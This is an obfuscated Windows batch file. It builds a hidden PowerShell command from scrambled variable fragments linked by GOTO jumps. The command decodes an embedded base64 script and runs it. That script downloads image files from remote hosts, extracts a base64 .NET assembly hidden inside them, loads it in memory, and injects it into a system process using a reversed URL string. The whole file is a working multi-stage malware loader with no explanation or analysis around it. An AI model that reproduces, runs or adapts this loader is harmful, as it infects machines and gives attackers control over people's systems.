@echo off
GOTO FDGDDNGJDN
:JJGIOOFGGI
SET KIJFFDSIFD=ZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwANA
GOTO FGIFGIGJOF
:SKDNNGDDFG
SET JDGDDGFFDI=QBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADUAIAB8ACAARgBvAHIAbQBhA
GOTO FDFNGDFSJJ
:FGJGSIIDGO
SET NNINFFDNGO=JABiAGEAcwBlADYANABMAGUAbgBnAHQAaABoACkAOwANAAoAIAAgACAAIAAgAC
GOTO SGOGJGIGDD
:DDODIIGNOF
SET SDDFHIHDGG=CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACA
GOTO INFIKSFGJI
:DGNIIGGNOO
SET DSJIJDUJDO=AANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGYAb
GOTO GDIOSNDGJH9
:NGGGFNDIFK
SET INGOJSGHGJ=ALQBUAGEAYgBsAGUAIABOAGEAbQBlACwAQwBQAFUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIA
GOTO FDDDFGSFDN0
:JINKDDGGJD
SET GFIFODGFDF=ACAAIAAgACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACAAPQAgAEcAZQB0A
GOTO IGJGOOFOSN
:IFNNDFNOSF
SET GGFIDISDJJ=wB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADUAIAB8ACAARgBvAHIAbQBhAHQ
GOTO NGGGFNDIFK
:JOIDSIFNGO
SET IUDFGFJNSS=QBuAHMAJwAgACsAIAAnAHMAJwApAC4ASQBuAHYAbwBf#AGUAKAAkAG4AdQBsAGwALAAgAFs
GOTO FDDDFGSFDN4
:OJSJIGIFDG
SET IHDNGIJHGK=bgBlACAAJABuAHUAbABsACkAIAB7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFM
GOTO IGNNDIGJFO
:NGIFIGUFKG
SET INGGJFKDIF=AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHcAZQBiAEMAbABpAGUAbgB0A
GOTO UJJHNGGJFF
:GGFNGSGGNN
SET HGNNIGGGJF=AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA
GOTO NGDUJJGNOG
:FJHGJSDDFO
SET DIDGONIIGG=B0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBk
GOTO NNJOGSISJS7
:FSJSGODFOF
SET OSFDJSOGJD=AAnAGEAdQA3ADIAbgB1AHgAegB2ADIALgB1AGYAcwAuAHMAaAAvAGYALwA0AEwAaABWADUAQgA
GOTO FHDFHFOJGF
:NJSGDIHFON
SET DDJDSFJNFN=AGEAZABEAGEAdABhAEYAcgBvAG0ATABpAG4AawBzACAAewAgAHAAYQByAGEAbQAgACgAWw
GOTO GDIOSNDGJH1
:FDGDDNGJDN
SET GDDDGGDNOO=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Star
GOTO GDIOSNDGJH
:GJNFIDOIIN
SET FGSIFSOUNN=C0AYgBjADQAMwA5ADQAYwBlADcAMgAxADcAJwApACwAKAAkAGwAZgBzAGQAZgBzAGQAZwAgACsAI
GOTO FSJSGODFOF
:FHDFHFOJGF
SET KGFNDINGDG=xAHMARABDAHcASQBIAGYAQgBNAGEAdgBpAG0AVgAxAHcAWQBMAEQAcwAzADcAcABCADkAMABJAG4AU
GOTO GHGJGNDDON
:FDIOJIGGDG
SET GGHNGFIDFJ=AKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAI
GOTO NNJOGSISJS3
:OFJJSINGGO
SET ODSSFFGGIG=wBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQ
GOTO FDGOJHIONN
:NGODGGNSDG
SET IGJOIOJDNJ=YgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGkAbgBf#ACk
GOTO GFOSNOKIKD
:FNKFOJGIGF
SET GDDONFGFNG=AZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AaABvAGwAZAAtADgAZgBhAGQANQAuAGYAaQBy
GOTO HSJDDIIFJG
:OGHSSFNGGS
SET DGJGFJFISF=G0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbAB
GOTO FDIIGUNNIJ3
:GJUOGHGDNI
SET IDSDNHDDKJ=AgACAAIAAgACQAbABpAG4AawBzACAAPQAgAEAAKAAoACQAbABmAHMAZABmAHMAZABnACAA
GOTO NIGFIGDJGF
:OOIKIFUINS
SET OGGONNFNFG=GEAbQAvAHMAZABhAGUAaAAvAHMAZgBlAHIALwA3ADMAMwAxAC8AOAAyADcAN
GOTO IDNFHHDFGD
:FONFGIGNGF
SET DDFIGFDGND=AAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAC0A
GOTO OJSJIGIFDG
:NDFHNJGGGI
SET NOGSGFGSDN=ZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBtAHkAcAByAG8AZwByA
GOTO GISNKIOSIF
:GFOSNOKIKD
SET OODOKJIGUI=AIAB9ACAAYwBhAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0AIAB9ADsAIAAN
GOTO NODFNHNDKI
:KSOIGOOJGG
SET IIODGNFJSG=AYgB1AGgAdABpAGcALgB3AGEAcgAvAC8AOgBzACcALAAgACcAMAAnACwAIAAnACc
GOTO FDDDFGSFDN8
:IGJGOOFOSN
SET FIJGSDNODD=C0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAbABpAG4AawBzA
GOTO GDIOSNDGJH7
:DIOFSIGFNI
SET DNGFOININF=lAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHIAd
GOTO JOIDSIFNGO
:FDFNGDFSJJ
SET UDSOHKGISF=HQALQBUAGEAYgBsAGUAIABOAGEAbQBlACwAQwBQAFUADQAKACAAIAAgACAAIAAgACAAIAAgAC
GOTO DKGFGFSIID3
:FGDNDIJNUF
SET GFNFDHIFGD=A='';$oWjfdsuxd = [system.Text.encoding]::Unicode.GetString([system.convert]:
GOTO NJSGDIHFON0
:FDJDHDJNGG
SET IDGNNJGGFG=cwBtACcAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbQB
GOTO DIOFSIGFNI
:FDGOJHIONN
SET NIGDIOJSND=AXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG
GOTO FDIIGUNNIJ1
:GISNKIOSIF
SET ISGNDONJIG=GEAbQAuAEgAbwBtAGUAZQBzACcAKQA7AA0ACgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO DKGFGFSIID6
:NHDIGDNDJN
SET FGINGJIISI=AAnAHMAOgAvAC8AJwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQA
GOTO JGSGGGNJND8
:IIFUHJGINS
SET FNDGOJGGNG=lAHgAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI
GOTO GNGINNGFUG
:HSJDDIIFJG
SET GJINOJJGGO=AGUAYgBhAHMAZQBzAHQAbwByAGEAZwBlAC4AYQBwAHAALwBvAC8AZgBvAHIAcwB0
GOTO NHIONFNOGN
:DKGFGFSIID
SET SFOGJUIIIN=8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgANAAoAIAAgACAAIAAgACAAIAAgACAAIA
GOTO FDDDFGSFDN
:NJSGDIHFON0
SET ISJIIFDHJF=:Frombase64string([regex]::Replace($ddsdgo, ''f#'', ''r'')));iex
GOTO NJSGDIHFON1
:KIIFFSGHOD
SET JGISNFONFG=ABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGY
GOTO FDIOJIGGDG
:FGIFGIGJOF
SET DOFDJJJJFO=AoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbABvAGE
GOTO FDIIGUNNIJ6
:IKHGGJNNGS
SET NFDINSGFKG=AFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlA
GOTO DJDKSGODIG7
:NNDSIJGJJU
SET DJJFSOONHD=IAAgACAAIAAgACAAIAAgACAAIAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgA
GOTO GSGOOGGOGG
:GSGOOGGOGG
SET OKGFFFDGIS=aAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZAB
GOTO IIFUHJGINS
:IDNFHHDFGD
SET UGDNFDDHFS=AA2ADIAMwA4ADIAMwAxAC8AbQBvAGMALgB0AG4AZQB0AG4AbwBjAHIAZQBzAHU
GOTO KSOIGOOJGG
:FNHDNOGFOG
SET FGGDFOGIGG=RgBsAGEAZwAuAEwAZQBuAGcAdABoADsAIAANAAoAIAAgACAAIAAgACAAIAAgACAA
GOTO NNDSIJGJJU
:DKGFGFSIID6
SET DSNDOONOKD=ACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAfAAgAFMAbwByAHQALQBPAGIAagBlA
GOTO DKGFGFSIID7
:UJJHNGGJFF
SET FUDGGKJOOD=CAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAG
GOTO JJISIFDDNN
:FDDDFGSFDN
SET IODIGGFINK=AgACAAIAAgACAAIAAgACAAIAAgAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AbABv
GOTO NJSGDIHFON
:GNGINNGFUG
SET NDNGDOGHJN=AAgACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4A
GOTO FFDIGFUDGN
:SGOGJGIGDD
SET DIOODKONOD=AAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeA
GOTO NOGOHNFINJ
:NJSGDIHFON3
%GDDDGGDNOO%%FDOIGOONFO%%FOUGJFFSNS%%DGOGDIFGDJ%%DDOFGOJNFD%%GIJGGGIKSF%%OKGJSGFGFU%%INOSNGISDI%%SFOGJUIIIN%%IODIGGFINK%%DDJDSFJNFN%%HGGNGDGNJO%%INGGJFKDIF%%FUDGGKJOOD%%FJGFGDGHFO%%GFIFODGFDF%%FIJGSDNODD%%JNOOJDJDOO%%DSJIJDUJDO%%JJIOGUJSNG%%OFIIGGNUNG%%IGJOIOJDNJ%%OODOKJIGUI%%SJNIDGFFJG%%ONGFDIIINI%%GDHDFOIOFF%%FIOGHOFOJI%%FGINGJIISI%%OGOOHFIKDO%%SDFKFKSINN%%IDSDNHDDKJ%%GODNKNGIDO%%GDDONFGFNG%%GJINOJJGGO%%HDNNKDHODD%%GODGNFNUJJ%%FGSIFSOUNN%%OSFDJSOGJD%%KGFNDINGDG%%DOJJHJGNIJ%%SDDFHIHDGG%%GDUOOSODFG%%NDDIIGGJIO%%DDFIGFDGND%%IHDNGIJHGK%%IOOOISGGGG%%NFDINSGFKG%%JDOGGODOOI%%FGIOHIINGS%%DKNJUDNODF%%GDNNNFOGUN%%JGISNFONFG%%GGHNGFIDFJ%%JGNIGISDFN%%IDDIHDSIIS%%KSOOGFNJIF%%DIDGONIIGG%%SDSDNFDFJH%%HGDJHGUDSN%%FGGDFOGIGG%%DJJFSOONHD%%OKGFFFDGIS%%FNDGOJGGNG%%NDNGDOGHJN%%INDOJIGJKF%%NNINFFDNGO%%DIOODKONOD%%IOIIJNDJGI%%IDNNOGGOJJ%%ODSSFFGGIG%%NIGDIOJSND%%GFSJFDGFIJ%%DGJGFJFISF%%NGJOISGIFF%%KIJFFDSIFD%%DOFDJJJJFO%%FJJIOGFSDN%%NGGGNOIISS%%HGNNIGGGJF%%DIJGJOIFIN%%ISOGDODSFG%%JDGDDGFFDI%%UDSOHKGISF%%SGGJINDNOF%%NOGSGFGSDN%%ISGNDONJIG%%DSNDOONOKD%%NIJNNUNJGJ%%GGFIDISDJJ%%INGOJSGHGJ%%IFONFDDNJU%%IDGNNJGGFG%%DNGFOININF%%IUDFGFJNSS%%HJGJUGIDGD%%OGGONNFNFG%%UGDNFDDHFS%%IIODGNFJSG%%JDSJGFFGGN%%GFNFDHIFGD%%ISJIIFDHJF%%UGKJIKDNUS%
GOTO NJSGDIHFON4
:NJSGDIHFON2
                      
GOTO NJSGDIHFON3
:NODFNHNDKI
SET SJNIDGFFJG=AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJ
GOTO JGSGGGNJND4
:DKGFGFSIID0
SET ISOGDODSFG=AGIAagBlAGMAdAAgAEMAUABVACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZ
GOTO SKDNNGDDFG
:JJISIFDDNN
SET FJGFGDGHFO=IAQwBsAGkAZQBuAHQAOwAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO JINKDDGGJD
:OONUKUJSNK
SET NGGGNOIISS=UAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAk
GOTO GGFNGSGGNN
:GDGIJJJIDI
SET IDDIHDSIIS=G0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7
GOTO NNJOGSISJS5
:INFIKSFGJI
SET GDUOOSODFG=ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBf#AHMAIAAkA
GOTO DGIOJJNIKD
:JFJSIOJDSD
SET GDNNNFOGUN=gAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAd
GOTO KIIFFSGHOD
:GIGFGDIGOJ
SET GDHDFOIOFF=AAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAcwAgAD0AIAAnAGgAdAB0AHAAJwA7AA0ACgAgACA
GOTO JGSGGGNJND6
:FDDDFGSFDN4
SET HJGJUGIDGD=AbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgB0AHMAZQB0AC8AbgBpA
GOTO OOIKIFUINS
:NNJOGSISJS
SET GIJGGGIKSF=CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBOAGUAdAAuAFMAZQByAHY
GOTO HNFNFJKDHG
:FDDDFGSFDN0
SET IFONFDDNJU=AgACAAIAAgACAAIAAgACAAIAAkAGkAbgBqAGUAYwA9ACcAUgBlAGcAJwAgACsAIAAnAEEA
GOTO FDJDHDJNGG
:FDDDFGSFDN8
SET JDSJGFFGGN=ALAAgACQAaQBuAGoAZQBjACwAIAAnADAAJwAgACwAIAAnAHgANgA0ACcAKQApAH0AfQ
GOTO FGDNDIJNUF
:FFOGKGJINO
SET GODGNFNUJJ=ABvAGsAZQBuAD0ANgBlAGMAZAA2AGYAMgA1AC0ANgBhADcANwAtADQANgBkADIALQA5ADcANQBjA
GOTO GJNFIDOIIN
:NGDUJJGNOG
SET DIJGJOIFIN=AgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAfAAgAFMAbwByAHQALQBP
GOTO DKGFGFSIID0
:JGSGGGNJND
SET FOUGJFFSNS=exe -WindowStyle Hidden -ArgumentList '-Command \"$ddsdgo = ''DQAKACAAIAAgA
GOTO GHDGFGNJND
:NNJOGSISJS7
SET SDSDNFDFJH=AEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkA
GOTO NNJOGSISJS8
:FDIIGUNNIJ
SET INOSNGISDI=AHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG
GOTO DKGFGFSIID
:NJSGDIHFON1
SET UGKJIKDNUS= $oWjfdsuxd\"'"
GOTO NJSGDIHFON2
:DGIOJJNIKD
SET NDDIIGGJIO=GwAaQBuAGsAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC
GOTO FONFGIGNGF
:IGNNDIGJFO
SET IOOOISGGGG=AeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBV
GOTO IKHGGJNNGS
:JGSGGGNJND4
SET ONGFDIIINI=ABuAHUAbABsACAAfQA7ACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC
GOTO GIGFGDIGOJ
:FFDIGFUDGN
SET INDOJIGJKF=HQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAA
GOTO FGJGSIIDGO
:NNJOGSISJS8
SET HGDJHGUDSN=IAB7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQA
GOTO FNHDNOGFOG
:NOGOHNFINJ
SET IOIIJNDJGI=AgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsA
GOTO HNFNFJKDHG8
:DJDKSGODIG
SET DDOFGOJNFD=QBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzAA0ACgAgACAAIAAgA
GOTO NNJOGSISJS
:GDIOSNDGJH
SET FDOIGOONFO=t-Process %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.
GOTO JGSGGGNJND
:GHGJGNDDON
SET DOJJHJGNIJ=gBKAGwAVABqAEcAeQBLAFcAcQBBAGMATgAnACkAKQA7ACAAIAAgACAAIAAgACAAIAANAAoAIAAgA
GOTO DDODIIGNOF
:HNFNFJKDHG
SET OKGJSGFGFU=AaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBv
GOTO FDIIGUNNIJ
:NHIONFNOGN
SET HDNNKDHODD=ACUAMgBGAHAAaQBjADgALgBqAHAAZwA/AGEAbAB0AD0AbQBlAGQAaQBhACYAd
GOTO FFOGKGJINO
:DJDKSGODIG9
SET DKNJUDNODF=UwBFACcAIAAf#ACAAJwA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwA
GOTO JFJSIOJDSD
:GDIOSNDGJH9
SET JJIOGUJSNG=wByAGUAYQBjAGgAIAAoACQAbABpAG4AawAgAGkAbgAgACQAcwBoAHUAZgBmAGwA
GOTO JGSGGGNJND0
:DKGFGFSIID3
SET SGGJINDNOF=AAIAAgACAAIAAgACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUA
GOTO NDFHNJGGGI
:NNJOGSISJS3
SET JGNIGISDFN=AAgACAAIAAgACAAIAAgACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpA
GOTO GDGIJJJIDI
:FDIIGUNNIJ6
SET FJJIOGFSDN=AZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAG
GOTO OONUKUJSNK
:JGSGGGNJND6
SET FIOGHOFOJI=AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABCAHkAdABlAHMAMgAgAD0AI
GOTO NHDIGDNDJN
:HNFNFJKDHG8
SET IDNNOGGOJJ=GEAZwApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAY
GOTO OFJJSINGGO
:NIGFIGDJGF
SET GODNKNGIDO=KwAgACcAZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGw
GOTO FNKFOJGIGF
:JGSGGGNJND8
SET OGOOHFIKDO=bABmAHMAZABmAHMAZABnACAAPQAgACAAJABCAHkAdABlAHMAIAAf#ACQAQgB
GOTO JGSGGGNJND9
:DJDKSGODIG8
SET FGIOHIINGS=ACAAIAAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQAnACAAKwAgACcA
GOTO DJDKSGODIG9
:FDIIGUNNIJ1
SET GFSJFDGFIJ=0AbQBhAG4AZAApADsAIAAgACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpA
GOTO OGHSSFNGGS
:JGSGGGNJND9
SET SDFKFKSINN=5AHQAZQBzADIAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA
GOTO GJUOGHGDNI
:JGSGGGNJND0
SET OFIIGGNUNG=ZQBkAEwAaQBuAGsAcwApACAAewAgAHQAcgB5ACAAewAgAHIAZQB0AHUAcgBuACAAJAB3AGUA
GOTO NGODGGNSDG
:GHDGFGNJND
SET DGOGDIFGDJ=CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQAL
GOTO DJDKSGODIG
:GDIOSNDGJH1
SET HGGNGDGNJO=BzAHQAcgBpAG4AZwBbAF0AXQAkAGwAaQBuAGsAcwApACAADQAKACAAIAAgACAAI
GOTO NGIFIGUFKG
:DKGFGFSIID7
SET NIJNNUNJGJ=GMAdAAgAEMAUABVACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAY
GOTO IFNNDFNOSF
:NNJOGSISJS5
SET KSOOGFNJIF=AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAcw
GOTO FJHGJSDDFO
:FDIIGUNNIJ3
SET NGJOISGIFF=hAGcAKQA7ACAAIAAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEA
GOTO JJGIOOFGGI
:GDIOSNDGJH7
SET JNOOJDJDOO=CAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAcwAuAEwAZQBuAGcAdABoADsAI
GOTO DGNIIGGNOO
:DJDKSGODIG7
SET JDOGGODOOI=HMAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO DJDKSGODIG8
:NJSGDIHFON4
